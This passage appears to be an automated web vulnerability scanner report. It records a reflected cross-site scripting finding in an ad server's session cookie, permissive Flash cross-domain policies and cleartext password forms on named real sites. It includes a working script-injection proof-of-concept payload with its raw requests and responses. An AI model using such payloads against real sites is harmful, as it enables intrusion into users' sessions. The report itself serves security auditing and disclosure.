GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU0MjQsICBuZXR3b3JrOiAgICAgICJob3VzZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjEwN2VhNGVjLWU4MWItNGYxOC04NThhLTk4NDRkODJmODg0NSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGVmNjgxNiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmMwODYxNDI1NzAiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInJvcyIsICBkaXY6ICAgICAgICAgICIxMDdlYTRlYy1lODFiLTRmMTgtODU4YS05ODQ0ZDgyZjg4NDUiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgMSwgIG5ldHdvcmtfaWQ6ICAgMTExLCAgYWNjb3VudF9pZDogICA0OTQsICBuZXR3b3JrX25hbWU6ICJIb3VzZSBBcnQiLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjEuMzgiLCAgZmVjcG06ICAgICAgICAiMS4zOCIsICBmaWxsOiAgICAgICAgICIxMDAuMDAiLCAgcGxhY2VtZW50OiAgICAicm9zIiwgIHJ1bGU6ICAgICAgICAgInJvcyIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJNYXhQb2ludCBJbnRlcmFjdGl2ZSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg3NCwgImJ1eSI6MTc4LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiTWVkaWFNYXRoIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1OTEwLCAiYnV5Ijo1MDQsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJUdXJuIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgwLCAiYnV5IjoxOTYsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJEYXRhWHUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4ODMsICJidXkiOjIwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifV0sICB0YXJnZXRpbmc6ICAgICIiLCAgYWR2ZXJ0aXNlcjogICAgIiIsICBsYW5kaW5nX3BhZ2U6ICAgICIiLCAgaG9zdDogICAgICAgICAibmotdGFnMzQifQ==
Content-Length: 1993
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:27 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024ef6816"><script>alert(1)</script>c086142570&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match">
...[SNIP]...
1.163. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros [meld_sess cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnewsrtb/728x90/ros

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2054b"><script>alert(1)</script>5f8eef092a5 was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3NydGIiLCAgYWQ6ICAgICAgICAgICAzMzU0MjQsICBuZXR3b3JrOiAgICAgICJob3VzZSIsICBzaXplOiAgICAgICAgICI3Mjh4OTAiLCAgZnJlcTogICAgICAgICAiMS05OTkiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjA2MDZlODJjLWI2MTMtNGFjZC1hYTA0LTFmZGYwZjk5N2IyYSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUyMDU0YiI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PjVmOGVlZjA5MmE1IiwgIGNvdW50cnk6ICAgICAgIlVTIiwgIGNpdHk6ICAgICAgICAgIkRhbGxhcyIsICBkbWE6ICAgICAgICAgIDYyMywgIHJlZ2lvbjogICAgICAgIlRYIiwgIGlwOiAgICAgICAgICAgIjE3My4xOTMuMjE0LjI0MyIsICBkZXB0aDogICAgICAgIDEsICB0YXJnZXQ6ICAgICAgICJyb3MiLCAgZGl2OiAgICAgICAgICAiMDYwNmU4MmMtYjYxMy00YWNkLWFhMDQtMWZkZjBmOTk3YjJhIiwgIHVybDogICAgICAgICAgImh0dHA6Ly93d3cuZm94bmV3cy5jb20vcG9saXRpY3MvaW5kZXguaHRtbCIsICBlbGFwc2VkOiAgICAgIDAsICBkZWNpc2lvbjogICAgICJhZCIsICBpbXA6ICAgICAgICAgIDEsICBuZXR3b3JrX2lkOiAgIDExMSwgIGFjY291bnRfaWQ6ICAgNDk0LCAgbmV0d29ya19uYW1lOiAiSG91c2UgQXJ0IiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIxLjM4IiwgIGZlY3BtOiAgICAgICAgIjEuMzgiLCAgZmlsbDogICAgICAgICAiMTAwLjAwIiwgIHBsYWNlbWVudDogICAgInJvcyIsICBydWxlOiAgICAgICAgICJyb3MiLCAgY3JlYXRpdmVfaWQ6ICAiIiwgIGJpZGRlcnM6ICAgICAgW3sibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjozMzU4NzQsICJidXkiOjE3OCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhTWF0aCAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTkxMCwgImJ1eSI6NTA0LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiVHVybiAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjMzNTg4MCwgImJ1eSI6MTk2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gcmVzcG9uc2UiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9LHsibmV0d29ya19uYW1lIjoiRGF0YVh1IChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MzM1ODgzLCAiYnV5IjoyMDAsImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyByZXNwb25zZSIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn1dLCAgdGFyZ2V0aW5nOiAgICAiIiwgIGFkdmVydGlzZXI6ICAgICIiLCAgbGFuZGluZ19wYWdlOiAgICAiIiwgIGhvc3Q6ICAgICAgICAgIm5qLXRhZzM3In0=
Content-Length: 1997
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:26 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<img width="0" height="0" src="http://p.brilig.com/contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b"><script>alert(1)</script>5f8eef092a5&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e2054b">
...[SNIP]...
2. Flash cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

2.1. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Fri, 08 Apr 2011 03:32:10 GMT
Expires: Thu, 31 Mar 2011 03:30:21 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 74684
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
2.2. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 09 Apr 2011 00:16:53 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
2.3. http://feeds.bbci.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=93
Expires: Sat, 09 Apr 2011 00:17:54 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
2.4. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 08 Apr 2011 20:00:06 GMT
Expires: Sat, 09 Apr 2011 20:00:06 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 15410
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
2.5. http://newsrss.bbc.co.uk/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 02 Feb 2010 14:29:34 GMT
Content-Type: text/xml
Cache-Control: max-age=117
Expires: Sat, 09 Apr 2011 00:18:18 GMT
Date: Sat, 09 Apr 2011 00:16:21 GMT
Content-Length: 1017
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...
3. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

3.1. http://appointron.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.4.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "8879d27282002ca61af216ed66e18e8a"
X-Runtime: 1ms
Set-Cookie: _base_session=BAh7BzoMY3NyZl9pZCIlZjEzMjVhMzZlNjc0MGFkZjU1MDQyMTBiNzZhOTc5ZTQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--587a67a84dd30f49cd5d102ac1c3a7523ee2b049; domain=.appointron.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1977019555
Age: 0
Via: 1.1 varnish
Content-Length: 12153

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<td id='login_content_table_cell'>
<form action="/session" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<td>
<input class="noFocus" id="password" name="password" onkeypress="return submitenter(this,event)" style="font-size: 22px; width: 220px; border: 0px;" type="password" />
</td>
...[SNIP]...
3.2. http://appointron.com/users/new  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://appointron.com
Path:   /users/new

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/new?plan_type_id=2 HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _base_session=BAh7BzoMY3NyZl9pZCIlMzYyZDE5YmY5YjlmYThlZTFkNjQ1MjM0NzE0OTljYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--1145f79e31b865380099261ac424a3b2abb8835b; __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.6.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:50:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "e9d79718dce53d6411782b2bf1fdaae0"
X-Runtime: 5ms
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1233507530
Age: 0
Via: 1.1 varnish
Content-Length: 11968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
...[SNIP]...
<br/>
<form action="/users" method="post"><div style="margin:0;padding:0">
...[SNIP]...
<br/>
       <input id="user_password" name="user[password]" size="30" type="password" />

       <label for="password_confirmation">
...[SNIP]...
<br/>
       <input id="user_password_confirmation" name="user[password_confirmation]" size="30" type="password" />

<br/>
...[SNIP]...
3.3. http://wcax.upickem.net/engine/Splash.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wcax.upickem.net
Path:   /engine/Splash.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /engine/Splash.aspx?contestid=17178 HTTP/1.1
Host: wcax.upickem.net
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Set-Cookie: contestid=17178; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
Set-Cookie: UPETemporaryShoppingCartID17178=36497604-4/9/2011 8:31:11 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: 293976; expires=Tue, 09-Apr-2041 12:31:11 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA"
Date: Sat, 09 Apr 2011 12:31:11 GMT
Content-Length: 39215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<center><form name="frmLogin" id="frmLogin" style="display:inline;" method="post" action="splash.aspx">
<table border="0" cellspacing="3" cellpadding="0" style="width:100%;" width="border-collapse:collapse; " class="UPE-StandardTableSmaller">
...[SNIP]...
<input id="txtPasswordDisplay" class="UPE-InputText" style="vertical-align:middle;color:grey;" size="10" value="Password" onfocus="TogglePassword('enter');"><input type="password" name="txtPassword" id="txtPassword" style="vertical-align:middle;display: none;" class="UPE-InputText" size="10" maxlength="10" onblur="TogglePassword('complete');">&nbsp;&nbsp;<input type="Submit" value="Login" class="UPE-ButtonText" style="vertical-align:middle;" onclick="javascript: if (navigator.appName == 'Microsoft Internet Explorer') { if (navigator.cookieE
...[SNIP]...
3.4. http://www.vermontopia.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vermontopia.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
Host: www.vermontopia.com
